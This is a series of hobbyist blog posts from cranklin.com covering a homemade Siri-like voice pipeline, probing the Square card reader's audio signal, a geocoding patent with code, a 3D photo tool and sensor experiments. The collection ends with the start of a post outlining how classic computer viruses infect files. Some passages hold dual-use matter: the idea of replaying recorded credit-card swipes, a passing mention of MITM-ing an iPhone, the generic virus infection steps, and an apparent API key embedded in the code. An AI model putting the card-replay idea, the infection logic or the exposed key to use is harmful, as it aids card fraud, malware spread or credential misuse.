cranklin.com
guns, computers, politics
JANUARY 13, 2012
Building My Own Siri / Jarvis
Most of the magic behind Siri happens remotely.
I want to create my OWN version of Siri…. except I don’t care for having it on my phone. I want my entire house to be talking to me… more like Jarvis (from Ironman).
I believe I have access to all the right resources to create this AI.
It breaks down into three major parts:
1) convert speech to text
2) query database populated with q&a
3) convert text to speech
Speech to Text
Most speech to text engines suck. Siri’s works exceptionally well because the engine isn’t on your phone… it’s remote. I suppose we could hack Siri by running a MITM attack on an iphone, faking the SSL cert, and intercepting the apple ID…. OR we can do something much simpler. Google’s Chrome 11 browser includes a voice input function (which isn’t yet part of the HTML5 standard) that converts your speech into text. This guy discovered that the conversion happens remotely through an undocumented API call to google. All we have to do is access that same API and we’ve got ourselves a free Speech-to-Text engine!
In case you don’t understand Perl, this is how you use the API:
POST to:
https://www.google.com/speech-api/v1/recognize?xjerr=1&client=chromium&lang=en-US
POST params:
Content — the raw bytes of a .flac encoding of your voice, recorded in mono at 16000 Hz or 8000 Hz
Content_Type — which should read “audio/x-flac; rate=16000” (or 8000, depending on your recording). This should also be mirrored in the Content-Type section of your header.
Response: json text
I used ffmpeg to convert my audio into the desired format:
ffmpeg -i Memo.m4a -vn -ac 1 -ar 16000 -acodec flac test.flac
So I recorded my voice on my iphone 3gs asking “what day is it today?” and converted it to the appropriate .flac format and posted it to google’s API and this is what I got in response:
{"status":0,"id":"008bd1a95c3c2b04bd754da5e82949f4-1","hypotheses":[{"utterance":"what day is it today","confidence":0.91573924}]}
Sweet.
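In case Perl isn’t your thing either, here is the same call and the response handling as a Python sketch. Keep in mind the endpoint is undocumented and could change or vanish at any time, and the function names (`recognize_flac`, `best_utterance`) are my own:

```python
import json

# Undocumented endpoint pulled from the Chromium source; subject to change/removal.
STT_URL = ("https://www.google.com/speech-api/v1/recognize"
           "?xjerr=1&client=chromium&lang=en-US")

def recognize_flac(path, rate=16000):
    """POST a mono FLAC recording and return the raw JSON response body."""
    import urllib.request
    with open(path, "rb") as f:
        audio = f.read()
    req = urllib.request.Request(
        STT_URL, data=audio,
        headers={"Content-Type": "audio/x-flac; rate=%d" % rate})
    return urllib.request.urlopen(req).read().decode("utf-8")

def best_utterance(response_body):
    """Pull the top hypothesis out of the JSON the API returns."""
    result = json.loads(response_body)
    return result["hypotheses"][0]["utterance"]
```

Feeding the response above through `best_utterance` gives back the recognized sentence.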
Database populated with Q&A
This is probably the most difficult part to obtain. To build it from scratch would require tons of data and advanced algorithms to interpret sentences constructed in various ways. I read somewhere that Siri was using Wolfram Alpha’s database….. so…. I checked out Wolfram Alpha and they have an engine that answers your questions. Not only that, they also offer an API service. (If you query less than 2000 times a month, it’s free!). So I signed up for the API service and tested it out. I asked it some simple questions like “What day is it today?” and “Who is the president of the United States?”. It returns all answers in a well-formed XML format.
<?xml version='1.0' encoding='UTF-8'?>
<queryresult success='true'
error='false'
numpods='1'
datatypes='City,DateObject'
timedout=''
timing='1.728'
parsetiming='0.193'
parsetimedout='false'
recalculate=''
id='MSP77719ii856b9090fei40000543b8b9eibb14ida&s=21'
related='http://www4d.wolframalpha.com/api/v2/relatedQueries.jsp?id=MSP77819ii856b9090fei400001d3h9h126cgaeigc&s=21'
version='2.1'>
<pod title='Result'
scanner='Identity'
id='Result'
position='200'
error='false'
numsubpods='1'
primary='true'>
<subpod title=''
primary='true'>
<plaintext>Friday, January 13, 2012</plaintext>
</subpod>
</pod>
</queryresult>
Again…. sweet.
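Pulling the answer out of that XML takes a couple of lines with any XML parser. A quick Python sketch (`extract_answer` is my own helper name):

```python
import xml.etree.ElementTree as ET

def extract_answer(xml_text):
    """Return the text of the first <plaintext> found under pod/subpod,
    or None if the query produced no result pod."""
    root = ET.fromstring(xml_text)
    node = root.find("./pod/subpod/plaintext")
    return node.text if node is not None else None
```

Run against the response above, it hands back the plain-English answer string.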
Text to Speech
This part is easy… and google makes it even easier with yet another undocumented API! It’s straightforward. A simple GET request to:
http://translate.google.com/translate_tts?tl=en&q=speech+to+convert
Just replace the q parameter with any sentence and you can hear google’s female robot voice say anything you want.
Voice Input
I can either make my program run over a web browser or as a stand-alone app. Running it over the web browser is cool because I would then be able to run it from just about any machine. Unfortunately, HTML 5 doesn’t have a means of recording voice. My options are a) only use google Chrome, b) make a flash app, c) make a Java applet.
Anywho… no big deal.
Putting It All Together
<?php
$stturl = "https://www.google.com/speech-api/v1/recognize?xjerr=1&client=chromium&lang=en-US";
$wolframurl = "http://api.wolframalpha.com/v2/query?appid=[GET+YOUR+OWN+STINKIN+APP+ID]&format=plaintext&podtitle=Result&input=";
$ttsurl = "http://translate.google.com/translate_tts?tl=en&q=master+cranky,+";
// Google Speech to Text
$filename = "./test1.flac";
$upload = file_get_contents($filename);
$data = array(
"Content_Type" => "audio/x-flac; rate=16000",
"Content" => $upload,
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $stturl);
curl_setopt( $ch, CURLOPT_HTTPHEADER, array("Content-Type: audio/x-flac; rate=16000"));
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
ob_start();
curl_exec($ch);
curl_close($ch);
$contents = ob_get_contents();
ob_end_clean();
$textarray = (json_decode($contents,true));
$text = $textarray['hypotheses']['0']['utterance'];
// Wolfram Alpha API
$wolframurl .= urlencode($text);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wolframurl);
ob_start();
curl_exec($ch);
curl_close($ch);
$contents = ob_get_contents();
ob_end_clean();
$obj = new SimpleXMLElement($contents);
$answer = $obj->pod->subpod->plaintext;
// Google Text to Speech
$ttsurl .= urlencode($answer);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ttsurl);
ob_start();
curl_exec($ch);
curl_close($ch);
$contents = ob_get_contents();
ob_end_clean();
header('Content-Type: audio/mpeg');
header('Cache-Control: no-cache');
print $contents;
?>
It responds with this answer. Good girl.
It’s still missing the voice input portion of the code. Currently, it just accepts a .flac file. I wrote 3 chunks of code and put them together as one pipeline of an AI process. The advantage of this over Siri is that I can intervene at any time. I can have it listen for particular questions such as “who is your master?” and respond appropriately…. but more importantly, I can have it listen for “turn on my lights” or “turn on the TV” or “open the garage door” or “turn to channel 618”. Certain phrases will have my bot send a signal to the appropriate Arduino-controlled light switch, garage switch, or IR blaster and respond with a “yes, master”. I’ll post videos when it’s done.
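That intervention step is really just a dispatch table sitting in front of the Wolfram Alpha call: check the recognized text against known commands first, and only fall through to the Q&A engine if nothing matches. A hypothetical sketch (the phrases and handlers here are made up for illustration):

```python
def route(text, commands, fallback):
    """Send recognized speech to a home-automation handler if the phrase
    is a known command; otherwise fall through to the Q&A engine."""
    handler = commands.get(text.strip().lower())
    return handler() if handler else fallback(text)

# Hypothetical command table: phrase -> action
commands = {
    "who is your master": lambda: "you are, master",
    "turn on my lights": lambda: "yes, master",   # would also signal the Arduino
}
```

Known phrases get the canned (or Arduino-triggering) response; everything else goes out to Wolfram Alpha as before.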
JANUARY 4, 2012
Hacking the Square
For Christmas, I received a cool little device called the square from Ed Park. You plug this device into the audio mini jack on your smartphone and you can swipe credit cards right on your phone. It’s perfect for people doing business on the go. Or… next time your buddy owes you money, the “I don’t have any cash on me right now” excuse won’t work.
The first strange thing I noticed was that the data was being input via the audio jack rather than the data port (located at the bottom of the iphone). There are 3 types of audio mini jacks: mono, stereo, and stereo/microphone. Since the iphone audio jack accepts corded hands-free earpieces as well as earphones for music, it has to be the combo jack (stereo/microphone).
If you look at the tip, you’ll notice there are four sections separated by insulated plastic rings.
This type of plug is known as the “TRRS”. T-R-R-S stands for Tip-Ring-Ring-Sleeve. The tip is for Left-channel audio out. The first ring is for Right-channel audio out. The second ring is Ground. The sleeve is for Microphone in.
What I would like to know is how the square transmits your credit card number into the software through the audio port.
Now, before wiring each terminal up to an arduino and outputting data to serial, since input is only possible through the sleeve (microphone terminal), maybe we can find out if the data is actually audible! By simply plugging it into a computer mic in port or firing the voice recorder app on the iphone, we can find out what our credit cards sound like.
Interesting. So if I just recorded the swipe of each of my credit cards, I can technically store credit card numbers as wav files and play them directly into the square software. I was inspecting each of my credit card wav files and tried to notice some kind of pattern that matched the pattern of my credit card numbers. I didn’t think that was going to be successful, but it was worth a shot.
I then decided to rig the square swiper up to my arduino and display output to serial.
Here is the arduino code:
const int mic = A5;
int counter = 0;
void setup()
{
Serial.begin( 9600 );
}
void loop()
{
counter++;
Serial.print(analogRead(mic));
Serial.print(" ");
delay(50);
if(counter>=40){
counter=0;
Serial.print("\n");
}
}
I chose an analog input because that audio minijack is analog. I know what each section in the TRRS specs do, but does it need power? Do I need to connect the ground? Do I need to power it through both left and right channels? I wasn’t sure, so I decided to simply try different combinations.
When I connect the ground, I get a bunch of ‘0’s. When I swipe the credit card, I get a few numbers… but not nearly enough to carry the data I’m assuming the stripe holds. When I disconnect ground, I notice something interesting.
Now I’m still not sure if I’m on the right track because I expected a bunch of 1’s and 0’s…. but I noticed a pattern in the numbers. The numbers are grouped in 4’s. Every four numbers, the pattern repeats itself.
It makes perfect sense. I’m going to assume the credit card stripe MUST be carrying 4 rows of data… thus 4 different reads from the swiper. So I tried swiping my credit card to investigate the reads. (I’m not posting the output from my credit card here…. but I’ll post the output from when I swiped my Disneyland Annual Passport!)
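One way to sanity-check the “grouped in 4’s” observation is to ask at what shift the sample stream best repeats itself. A toy sketch on synthetic data (not real card output; `best_period` is my own name):

```python
def best_period(samples, max_period=8):
    """Return the candidate period (2..max_period) with the fewest
    mismatches between each sample and the one a full period earlier."""
    def mismatches(p):
        return sum(1 for i in range(p, len(samples)) if samples[i] != samples[i - p])
    return min(range(2, max_period + 1), key=mismatches)
```

On a stream that repeats every four readings, this picks out 4.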
I’m gonna go ahead and assume the data isn’t encrypted (at this level at least. I’m pretty certain it’s encrypted at the software level)… so it’s just a matter of deobfuscating it. Unfortunately for me, I was staring closely at the output and I started getting sleepy. Hmmm. I’m not sure if I’m on the right track or not… so feel free to chime in if you have any ideas. I shall come back to this later.
DECEMBER 31, 2011
My Onionmap Patent
One of my previous jobs was at Onionmap as the Director of Engineering. Titles mean crap. I don’t even know what it means to be a “director”. A more accurate job title would have been “systems architect”… but whatever.
Onionmap was actually pretty cool. They provided interactive maps of major cities (33 to be exact). Unlike google maps, they were 3-dimensional visual/artistic renderings of each city and its major landmarks. In other words, they’re tourist maps. The maps are skewed and exaggerated: landmarks are enlarged, and unsightly objects such as parking lots are nonexistent.
Prior to my arrival, Onionmap hired many different engineers. Besides talking a big game at meetings, they provided no real work (sort of like politicians). Meeting after meeting, they would sweet-talk everyone else into confidence. At the end of the day, they did absolutely nothing. Another thing these previous “engineers” had in common was that they all believed that it was impossible to geocode the skewed maps. In other words, these maps could never be used with GPS data nor pinpoint exact addresses.
When I joined the Onionmap team, I was obsessed with geocoding these maps.
A couple months in, I had tested several different theories… pulled out my old trigonometry books… tried all sorts of weird things with angle measurements, etc. They weren’t working. I cleared my head and tried to think simple. I believe true engineering is about simplicity. I realized I was onto something with y-intercepts. Yes… going way back in math. Then I got it. Before the 3rd month of my employment, I had figured it out and written the engine. I presented it to the company and they asked me to do a write-up immediately so they could file it for patent. Patent? Okay.
Now I’m not a big fan of patent laws and frivolous lawsuits. On top of that, I’m not even sure of the fate of Onionmap. Shame. I don’t want my algorithm/code to go to waste. At least I can share it with you here on my blog:
You can download it here.
You’ll notice the inventors are listed as me, Jonathan Lee (my cool project manager), and a guy named Young Kim. Mind you, Young Kim is a douchebag who lives in Korea and did absolutely nothing to contribute to this. He’s a self-proclaimed “CTO”, but he has absolutely NO knowledge of anything remotely technical. Because of this guy, I wasted MUCH time building onionmap versions 1 through 7. No joke. In two years at Onionmap, I built 7 different versions of the site and NONE of them was released. That’s how you demoralize your engineer. Just saying. Anyways, here is the write-up submitted for patent.
Onionmap Patents
Patent #1: Translation OSAT-Geocode
Inventors: Young Kim, Eddie Kim, Jonathan Lee
Business concept / Background: Onionmap Spatial Analysis Technology (OSAT) is a proprietary process used to create beautiful, easy-to-read 3D buildings and maps. OSAT is best understood as a piece of outstanding artwork: anyone can draw a building and a landscape, but each artist’s drawing provokes a different human reaction. OSAT is not patented, but it is protected under Onionmap trademark and copyright. OSAT maps are not drawn to scale, because the goal is a beautiful visual representation of the 3D buildings and the landscape. Although the maps are not to scale and there is no consistent way of producing each 3D building and map, there is a need to translate a geocode to an OSAT code so that a real-world location can be identified on the OSAT interactive online map. Because each OSAT city map is unique, the translation from geocode to each OSAT map is also unique. However, this unique process is consistent, replicable, and accurate, and it is the core component linking all the business functions of Onionmap products based on OSAT maps. Hence Onionmap intends to patent this process.
Scientific process: translating a geocode to an OSAT code
To initialize the transcoding engine, follow these steps:
1) Take the map and find its total width and total height.
2) Plot the longitude/latitude pair for each corner of the map. (Google Maps can supply this data.)
3) Find the exact north/south slope: find a street or 2 points on the map that are perfectly parallel to the standard longitude lines, and calculate the slope (rise over run).
4) Find the exact east/west slope the same way, using 2 points perfectly parallel to the standard latitude lines:
m = (y2 - y1) / (x2 - x1)
How the transcoding engine works:
Given the longitude x, find the 2 corners of the map whose longitude values bracket x. (If x does not lie between any 2 corners’ longitude values, the target location is outside the map.) Then find where x lies relative to the longitude values of these 2 corners:
ratio = (x - corner1) / (corner2 - corner1)
Using the north/south slope, find the y-intercept of the longitude line through each corner using slope-intercept form (x and y here are Onionmap coordinates):
y = mx + b
Once b is solved for each corner (corner1_b, corner2_b), apply the ratio to the y-intercepts and solve for target_b:
ratio = (target_b - corner1_b) / (corner2_b - corner1_b)
Plug target_b and the north/south slope m back into y = mx + b, and we have the equation of our first line, longitude_line. Next, repeat the same process to find latitude_line, using the east/west slope and the latitude half of the geocode. Once both lines are solved, find their intersection. First solve for x:
(m1 * x) + b1 = (m2 * x) + b2
Then solve for y:
y = m1 * x + b1 (equivalently, y = m2 * x + b2)
We now have our (x, y) pair.
Increasing accuracy: so far the translation uses 4 points (the corner points). Taking 4 additional points increases accuracy.
The translation from OSAT code to geocode is the reverse of the above process.
Technology Product: The following is the initial ‘working’ product in the form of computer software code.
Just like every other software, this product will evolve with time.
Excerpt of Geocode.php (class):
<?php
/* Geocode class
   Usage: if(!is_object($Geocode)) $geocode = new Geocode($CITY);
*/
//Requirements:
class Geocode {
    // DEBUG MODE
    private $debug = 0;
    // SELECTED CITY
    private $city;
    // COORDINATES FOR EACH CORNER OF THE MAP (OM view)
    private $om_ul_long; private $om_ur_long; private $om_ll_long; private $om_lr_long;
    private $om_ul_lat;  private $om_ur_lat;  private $om_ll_lat;  private $om_lr_lat;
    private $x_min; private $x_max; private $y_min; private $y_max;
    // LONGITUDE AND LATITUDE SLOPE
    private $slope_long; private $slope_lat;
    // GEOCODER BASE URL (REST)
    private $geocoder_api_rest = "http://rpc.geocoder.us/service/csv?address=";
    private $yahoo_geocoder_api_rest = "http://local.yahooapis.com/MapsService/V1/geocode?appid=WCZ107vV34Ed.N5OCPbHpRbalLm1nezhYnzoy597AvofLaVUQvItD3AQNNUGZQw-&location=";

    // Constructor
    public function __construct(){
        $city = "las vegas";
        $this->city = $city;
        switch($city){
        case "las vegas":
            $this->om_ul_long = -115.22015;
            $this->om_ul_lat = 36.15413611111111;
            $this->om_ur_long = -115.13938055555556;
            $this->om_ur_lat = 36.187127777777775;
            $this->om_ll_long = -115.17540277777778;
            $this->om_ll_lat = 36.084944444444446;
            $this->om_lr_long = -115.10328055555556;
            $this->om_lr_lat = 36.11882222222222;
            $this->x_min = 0;
            $this->x_max = 10565;
            $this->y_min = 0;
            $this->y_max = 4700;
            $this->slope_lat = (4029 - 3609)/(-2859 + 1000);
            $this->slope_long = (4299 - 3059)/(-1372 + 2888);
            break;
        default:
        }
    }

    public function geocode2omcode($latitude,$longitude){
        if($this->debug) echo "<br>Geocode::geocode2omcode<br>";
        if($this->debug) echo "<br>".$latitude."<br>".$longitude;
        // check to see if it's within the area (natural view)
        if($longitude > $this->om_ul_long && $longitude < $this->om_lr_long
           && $latitude > $this->om_ll_lat && $latitude < $this->om_ur_lat){
            // Convert latitude to om code
            if($latitude < $this->om_lr_lat){
                $ratio_lat = ($latitude - $this->om_ll_lat)/($this->om_lr_lat - $this->om_ll_lat);
                // y = mx + b
                $b_lat_1 = (-1)*$this->y_max - ($this->slope_lat * $this->x_min);
                $b_lat_2 = (-1)*$this->y_max - ($this->slope_lat * $this->x_max);
                $b_lat = $b_lat_1 + (($b_lat_2 - $b_lat_1) * $ratio_lat);
                // ($b_lat - $b_lat_1)/($b_lat_2 - $b_lat_1) = $ratio_lat
                // y = ($this->slope_lat * x) + $b_lat
                if($this->debug) echo "<br>ll - lr<br>b1,b2: ".$b_lat_1.",".$b_lat_2."<br>ratio: ".$ratio_lat."<br>slope: ".$this->slope_lat."<br>b: ".$b_lat;
            }
            elseif($latitude < $this->om_ul_lat){
                $ratio_lat = ($latitude - $this->om_lr_lat)/($this->om_ul_lat - $this->om_lr_lat);
                // y = mx + b
                $b_lat_1 = (-1)*$this->y_max - ($this->slope_lat * $this->x_max);
                $b_lat_2 = (-1)*$this->y_min - ($this->slope_lat * $this->x_min);
                $b_lat = $b_lat_1 + (($b_lat_2 - $b_lat_1) * $ratio_lat);
                // ($b_lat - $b_lat_1)/($b_lat_2 - $b_lat_1) = $ratio_lat
                // y = ($this->slope_lat * x) + $b_lat
                if($this->debug) echo "<br>lr - ul<br>b1,b2: ".$b_lat_1.",".$b_lat_2."<br>ratio: ".$ratio_lat."<br>slope: ".$this->slope_lat."<br>b: ".$b_lat;
            }
            else{
                $ratio_lat = ($latitude - $this->om_ul_lat)/($this->om_ur_lat - $this->om_ul_lat);
                // y = mx + b
                $b_lat_1 = (-1)*$this->y_min - ($this->slope_lat * $this->x_min);
                $b_lat_2 = (-1)*$this->y_min - ($this->slope_lat * $this->x_max);
                $b_lat = $b_lat_1 + (($b_lat_2 - $b_lat_1) * $ratio_lat);
                // ($b_lat - $b_lat_1)/($b_lat_2 - $b_lat_1) = $ratio_lat
                // y = ($this->slope_lat * x) + $b_lat
                if($this->debug) echo "<br>ul - ur<br>b1,b2: ".$b_lat_1.",".$b_lat_2."<br>ratio: ".$ratio_lat."<br>slope: ".$this->slope_lat."<br>b: ".$b_lat;
            }
            // Convert longitude to om code
            if($longitude < $this->om_ll_long){
                $ratio_long = ($longitude - $this->om_ul_long)/($this->om_ll_long - $this->om_ul_long);
                // y = mx + b
                $b_long_1 = (-1)*$this->y_min - ($this->slope_long * $this->x_min);
                $b_long_2 = (-1)*$this->y_max - ($this->slope_long * $this->x_min);
                $b_long = (-1) * ($b_long_1 + (($b_long_1 - $b_long_2) * $ratio_long));
                // ($b_long - $b_long_1)/($b_long_2 - $b_long_1) = $ratio_long
                // y = ($this->slope_long * x) + $b_long
                if($this->debug) echo "<br>ul - ll<br>b1,b2: ".$b_long_1.",".$b_long_2."<br>ratio: ".$ratio_long."<br>slope: ".$this->slope_long."<br>b: ".$b_long;
            }
            elseif($longitude < $this->om_ur_long){
                $ratio_long = ($longitude - $this->om_ll_long)/($this->om_ur_long - $this->om_ll_long);
                // y = mx + b
                $b_long_1 = (-1)*$this->y_max - ($this->slope_long * $this->x_min);
                $b_long_2 = (-1)*$this->y_min - ($this->slope_long * $this->x_max);
                $b_long = $b_long_1 + (($b_long_2 - $b_long_1) * $ratio_long);
                // ($b_long - $b_long_1)/($b_long_2 - $b_long_1) = $ratio_long
                // y = ($this->slope_long * x) + $b_long
                if($this->debug) echo "<br>ll - ur<br>b1,b2: ".$b_long_1.",".$b_long_2."<br>ratio: ".$ratio_long."<br>slope: ".$this->slope_long."<br>b: ".$b_long;
            }
            else{
                $ratio_long = ($longitude - $this->om_ur_long)/($this->om_lr_long - $this->om_ur_long);
                // y = mx + b
                $b_long_1 = (-1)*$this->y_min - ($this->slope_long * $this->x_max);
                $b_long_2 = (-1)*$this->y_max - ($this->slope_long * $this->x_max);
                $b_long = $b_long_1 + (($b_long_2 - $b_long_1) * $ratio_long);
                // ($b_long - $b_long_1)/($b_long_2 - $b_long_1) = $ratio_long
                // y = ($this->slope_long * x) + $b_long
                if($this->debug) echo "<br>ur - lr<br>b1,b2: ".$b_long_1.",".$b_long_2."<br>ratio: ".$ratio_long."<br>slope: ".$this->slope_long."<br>b: ".$b_long;
            }
            // Find intersection of the 2 lines
            // ($this->slope_long * x) + $b_long = ($this->slope_lat * x) + $b_lat
            $x = ($b_long - $b_lat) / ($this->slope_lat - $this->slope_long);
            $y = (-1)*(($this->slope_lat * $x) + $b_lat);
            if($this->debug) echo "<br>".$x.",".$y;
            $omcode[0] = $x;
            $omcode[1] = $y;
            return $omcode;
        }
        else{
            // outside of map area
        }
    }
}
?>
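Stripped of the per-city branching, the whole corner-interpolation scheme fits in a few lines. Here is a Python sketch of the idea (function and variable names are mine, and the test map below is synthetic, not a real Onionmap city):

```python
def geocode_to_map(lon, lat, west, east, south, north, m_ns, m_ew):
    """Translate (lon, lat) to skewed-map (x, y).

    west/east are (longitude, (x, y)) corner pairs spanning the map's
    longitude range; south/north are (latitude, (x, y)) pairs spanning
    its latitude range. m_ns is the pixel-space slope of constant-longitude
    lines, m_ew the slope of constant-latitude lines.
    """
    def intercept(pt, m):
        # b = y - m*x for the line of slope m through pt
        x, y = pt
        return y - m * x

    # Interpolate the y-intercept of the constant-longitude line through our point.
    r = (lon - west[0]) / (east[0] - west[0])
    b_w, b_e = intercept(west[1], m_ns), intercept(east[1], m_ns)
    b_lon = b_w + r * (b_e - b_w)

    # Same for the constant-latitude line.
    r = (lat - south[0]) / (north[0] - south[0])
    b_s, b_n = intercept(south[1], m_ew), intercept(north[1], m_ew)
    b_lat = b_s + r * (b_n - b_s)

    # Intersect y = m_ns*x + b_lon with y = m_ew*x + b_lat.
    x = (b_lat - b_lon) / (m_ns - m_ew)
    return x, m_ns * x + b_lon
```

On a synthetic map defined by the affine skew x = 2·lon + 0.3·lat, y = 0.2·lon + 3·lat, the sketch recovers the exact pixel coordinates, which is the point of the method: the corner intercepts pin down the skew.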
DECEMBER 20, 2011
Convert Your Pictures to 3D
If you’re curious as to how I made it and how it works, read on.
Get your red and cyan 3D glasses out. I was at Ed Park’s place and he had a pair of red / cyan 3D glasses along with a 3D drawing notepad.
Cool. In theory, I understood how 3D glasses work… but I wanted to experiment with it more. So Ed kindly let me borrow the notepad and the glasses.
So, when you look at a 3D image, there are 2 images… one blue (or cyan), one red. The glasses cancel one of them out on each eye, tricking your brain’s depth perception.
I decided to write software that can 1) take one photo and make it 3D glasses compatible and 2) take two photos that were taken side by side and combine them as one 3D glasses compatible photo.
Sounds do-able… Why not? I first took a photo of my parents’ dog Einstein.
I love PHP-GD. You can do wonders with it. So I used a GD image filter with the IMG_FILTER_COLORIZE option and I was able to apply the appropriate filters needed to make this work.
Now, going back to Ed’s notepad…. there’s a scribble on it. When I look at it right-side up, the scribble looks like it’s floating on top of a grid of lines. When I flip the notepad upside down, the scribble looks like it’s underneath the grid. Interesting. The red filter is on my left eye, so if the red image is shifted to the right of the cyan image, it pops in. If the red image is shifted to the left of the cyan image, it pops out!
This image pops in and
this image pops out.
To be honest, this is kind of boring because the “anchor” is the dust on my laptop screen…. and the 2nd image, in order for it to look popped out, you need to stand back from your screen.
Now, what if I took 2 photos (the way 3d movies are filmed with 2 lenses) and I applied a red filter on one and a cyan filter on the other? Wouldn’t that be much better?
Taking these photos, I tried it out.
Now you need to step back from your computer screen with your 3d glasses in order for it to look good. I made the mistake of taking a photo of an object much too close.
If you see doubles, step back. Way back. Why do you see doubles? Well, focus on your computer screen and put your finger close to your eyes. You see double right? Apparently it’s not possible to make the image pop out SO close to your face that it can kiss you…. That is, without you seeing double. Now, if I shift the photos so the red and blue image overlap at the bottle, that becomes the focal point. Everything in front of it pops out and everything behind it pops in.
I made the focal point the plant on my desk. Pretty cool. Go ahead and use the 3d-izer to 3d-ize your photos. Just remember to take photos of objects that are somewhat distant. It also looks better on a bigger screen.
Cranky’s 3d-izer
Enjoy. Here’s the source code:
<?php
if(is_uploaded_file($_FILES['leftphoto']['tmp_name'])){
$leftphoto = $_FILES['leftphoto']['tmp_name'];
$leftphototype = $_FILES['leftphoto']['type'];
if(is_uploaded_file($_FILES['rightphoto']['tmp_name'])){
$type = "double";
$rightphoto = $_FILES['rightphoto']['tmp_name'];
$rightphototype = $_FILES['rightphoto']['type'];
}
else{
$type = "single";
$rightphoto = $_FILES['leftphoto']['tmp_name'];
$rightphototype = $leftphototype;
}
$glasses = $_POST['glasses'];
$poptype = $_POST['poptype'];
if($leftphototype === "image/jpeg" || $leftphototype === "image/pjpeg"){
$bim = imagecreatefromjpeg($leftphoto);
$rim = imagecreatefromjpeg($rightphoto);
}
elseif($leftphototype === "image/png" || $leftphototype === "image/x-png"){
$bim = imagecreatefrompng($leftphoto);
$rim = imagecreatefrompng($rightphoto);
}
elseif($leftphototype === "image/gif"){
$bim = imagecreatefromgif($leftphoto);
$rim = imagecreatefromgif($rightphoto);
}
unlink($leftphoto);
if($type==="double") unlink($rightphoto);
if($glasses === "redblue") $gvalue=0;
elseif($glasses === "redcyan") $gvalue=255;
imagefilter($bim, IMG_FILTER_COLORIZE, 0, $gvalue, 255);
imagefilter($rim, IMG_FILTER_COLORIZE, 255, 0, 0);
if($type==="double") $offset = 0;
elseif($poptype==="in") $offset = -50;
else $offset = 50;
imagecopymerge($rim,$bim,$offset,0,0,0,imagesx($bim),imagesy($bim),50);
header('Content-Type: image/jpeg');
imagejpeg($rim);
imagedestroy($rim);
imagedestroy($bim);
}
?>
DECEMBER 6, 2011
Testing My Robot’s Eyes
I’m working on building my first robot, but I’m still trying to decide all of its functions. What I do know is this:
1) It will be pretty primitive.
2) It will have wheels or treads instead of feet.
3) I’m going to try to make it look cute
So I’m testing out its eyes right now. They look like eyes, but technically they’re an ear and a mouth. My robot will use echolocation (like bats) to be aware of its surroundings and avoid obstacles.
One side transmits a high frequency wave and the other waits for it to return. The timing allows us to determine the distance from a solid object.
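The arithmetic behind that timing is simple: sound travels at roughly 343 m/s, and the echo covers the distance twice. That is where the common “divide microseconds by 148” Arduino rule of thumb for inches comes from. A sketch of the conversion (the Ultrasonic library does the equivalent internally):

```python
def echo_to_inches(echo_us):
    """Convert a round-trip echo time in microseconds to inches.
    At ~343 m/s, sound covers one inch in ~74 us one way, so a round
    trip to an object n inches away takes ~148*n microseconds."""
    return echo_us / 148.0
```

So an echo that takes 1480 µs to come back puts the obstacle about 10 inches away.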
This module was so cheap on ebay, I was a bit skeptical as to how well it would work. It works great. It’s surprisingly accurate. I tested it with this short snippet of code:
#include <Ultrasonic.h>
Ultrasonic ultrasonic( 12, 13 );
void setup()
{
Serial.begin( 9600 );
}
void loop()
{
Serial.print( ultrasonic.Ranging(INC) );
Serial.println( " in" );
delay(1000);
}
Automatic Toilet Flusher?
If I wanted to, I could add something like this in the code:
distance = ultrasonic.Ranging(INC);
if(distance<DISTANCE_TO_WALL){
counter++;
}
else{
if(counter>20000){
flush_toilet();
}
counter=0;
}
… and hook up a servo to the arduino, and it would be an automatic toilet flusher that flushes after you step away. The commercial sensors you see on toilets nowadays use IR sensors rather than ultrasonic sensors like this one… but this ultrasonic sensor, with my code, would eliminate the annoying random premature flushes (while you’re placing the seat cover on the toilet seat, or while you’re sitting on the toilet). But to be honest, I don’t want my robot’s eyes to sit atop a toilet all day. No. I wouldn’t do that to him/her.
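The reason this avoids premature flushes is the counter: the flush only arms after a long, continuous presence in front of the sensor, and it only fires once the sensor sees the wall again. A quick Python simulation of the same logic (thresholds shrunk for testing; `simulate_flusher` is my own name):

```python
def simulate_flusher(readings, wall_distance, presence_threshold):
    """Feed a sequence of distance readings through the counter logic;
    return the number of flushes triggered."""
    flushes = 0
    counter = 0
    for distance in readings:
        if distance < wall_distance:          # someone is in front of the sensor
            counter += 1
        else:                                 # sensor sees the wall again
            if counter > presence_threshold:  # they stayed long enough: flush
                flushes += 1
            counter = 0
    return flushes
```

A brief blip in front of the sensor never flushes; only a sustained presence followed by departure does.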
NOVEMBER 30, 2011
Copycats: When I Move You Move!
In April 2011, my buddy Eugene launched a website called Likeacoupon.com. Likeacoupon is very clever. This deal site doesn’t require you to do anything but “like” the coupon on facebook. The wonderful coupons and simplicity made the site viral. So viral, in fact, that I was brought on board to deal with the high traffic and scalability issues. I mean… it’s not every day you see a website earn over 172,000 “likes” in a little over half a year… and that’s for the main site, not the individual coupons. Might I boast that when Likeacoupon released a Sephora coupon, it directed so much traffic to sephora.com that it brought down their site for a few hours?
Lol. We meant no harm. It was like an unintentional DDOS attack. But that’s how effective likeacoupon is.
In October, Eric Mitchell launched a knockoff of likeacoupon.com. It’s called “likebids.com”. Okay. Now I understand that good ideas attract copycats and knockoffs… but c’mon. Be a little original please?
Not only did they copy the “about” word for word, they copied the meta og:description tag (used for facebook opengraph) word for word. Hahaha. These guys are just shameless.
I got 5 words for you Eric Mitchell:
When I move you move!
NOVEMBER 29, 2011
How to Create a Computer Virus
I was sick (and bored) this week, and my brain didn’t want to do any work. I was lying in bed with a cold/flu virus, thinking about modern day computer viruses while shaking my head in disappointment (or virii for the ’90s hackers… hereinafter referred to as “viruses” for everyone else’s sake). Computer viruses these days are a joke. They’re not very stealthy, they don’t spread very far, and they can be removed far too easily. Once upon a time, viruses were a form of art… and they were ALL written in Assembly. Anything less (or shall I say more) was considered a joke. The traditional computer virus’ job was simple:
1) Search for infectable files.
2) Check for the virus signature.
3) If the signature exists, the file is already infected. Keep searching. If not, infect it using the bytes from one of the infected files.
4) Don’t bomb the computer until a trigger of some sort… eg: a particular date.
